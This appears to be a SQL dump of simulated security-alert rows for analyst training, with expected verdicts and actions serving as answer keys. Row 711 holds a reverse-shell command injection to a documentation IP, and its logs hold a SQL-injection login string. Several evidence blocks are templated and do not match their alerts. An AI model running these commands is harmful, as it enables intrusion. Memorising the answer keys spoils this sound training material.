(707, 'Brute Force Login Attempt Detected', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address. The source is from a foreign location.', 'Credential Attack', 'T1110', 1, 'Investigating', 52, '{\"timestamp\":\"2026-01-11T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-09 17:39:12', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and the source IP\'s malicious history confirm this as a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.353Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(708, 'Malware Detected on Endpoint', 'critical', 'CrowdStrike', 'A known malware signature was detected on an endpoint. The malware has a high detection rate on VirusTotal.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\malicious\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 06:01:10', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60/70 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"CrowdStrike\",\"verdict\":\"malicious\",\"details\":\"Confirmed execution of known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is widely recognized as malicious, indicating a confirmed malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(709, 'Phishing Email with Malicious Link Detected', 'medium', 'Proofpoint', 'A phishing email was detected with a link leading to a known malicious site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:20:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"email_sender\":\"phisher@malicious.com\",\"url\":\"http://malicious-site.com/fake-login\",\"username\":\"jdoe\",\"hostname\":\"user-laptop-03\"}', '2026-01-10 16:11:58', '2026-02-15 05:02:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Proofpoint\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign sender\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/fake-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site hosting phishing login page\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing sites\"}}],\"expected_actions\":[\"block_url\",\"close_alert\",\"user_education\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.355Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(710, 'Suspicious Network Activity Detected', 'low', 'Firewall', 'An unusual spike in outbound traffic was detected from an internal server, but no malicious activity was confirmed.', 'Data Exfiltration', 'T1041', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:15:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"internal-server-01\",\"bytes_sent\":5000000}', '2026-01-09 23:38:05', '2026-02-13 18:56:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in benign traffic, no confirmed malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Traffic was determined to be a legitimate data transfer after further analysis.\"}', 'Novice', 'NDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(711, 'APT41 Command Injection Detected', 'high', 'Wazuh', 'A command injection attempt was identified on a web server. The attacker executed a shell command which could allow them to gain unauthorized access to the system.', 'Web Attack', 'T1059', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"webadmin\",\"hostname\":\"web-server-01\",\"command_line\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\"}', '2026-01-09 18:42:52', '2026-02-16 02:42:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection attempt with a known malicious IP confirms the alert as true positive.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.357Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"command_line\\\":\\\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(712, 'Spear-Phishing Attempt by APT29', 'medium', 'Proofpoint', 'A spear-phishing email was detected targeting the finance department. It included a link to a credential harvesting site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"username\":\"j.doe@company.com\",\"hostname\":\"mail-server-01\",\"email_sender\":\"finance@trusted-source.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-10 20:11:25', '2026-02-22 14:40:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance@trusted-source.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL classified as phishing site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and suspicious sender email confirm the phishing attempt, marking it as true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Attempt by APT29\",\"date\":\"2026-02-01T20:32:22.358Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(713, 'Failed Login Attempts from Unusual Location', 'low', 'Splunk', 'Multiple failed login attempts detected for user \'admin\' from a foreign IP address indicating potential brute force attack.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-11T14:22:59Z\",\"event_type\":\"login_failure\",\"src_ip\":\"212.47.229.1\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server-01\",\"failed_attempts\":15}', '2026-01-09 22:20:35', '2026-02-26 21:56:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"212.47.229.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Standard admin account for internal systems\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts from a suspicious IP suggest a brute force attack, making it a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(714, 'Suspicious Network Activity Detected (False Positive)', 'medium', 'Firewall', 'Unusual network traffic was detected from an internal IP to an external cloud service. Further investigation reveals this as legitimate user activity.', 'Network Anomaly', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T16:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"52.34.67.89\",\"username\":\"m.smith\",\"hostname\":\"user-pc-02\",\"domain\":\"cloud-storage.com\"}', '2026-01-10 13:30:15', '2026-03-04 16:08:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"cloud-storage.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate cloud storage service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic was confirmed to be legitimate access to a known cloud service by an authorized user, hence a false positive.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(715, 'Malicious File Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on the host, potentially linked to APT41 activity. The process resembles known malware used for data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host-001\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"file_hash\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\"}', '2026-01-11 07:59:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicative of malicious activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command and the file hash are linked to known APT41 malware, indicating a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(716, 'Suspicious Login Attempt Detected from Foreign IP', 'medium', 'SIEM', 'Multiple failed login attempts detected from a suspicious IP address. This could indicate a brute force attack targeting user credentials.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"host-002\",\"failed_attempts\":15}', '2026-01-10 14:22:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The multiple failed login attempts from a known malicious IP address confirm a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 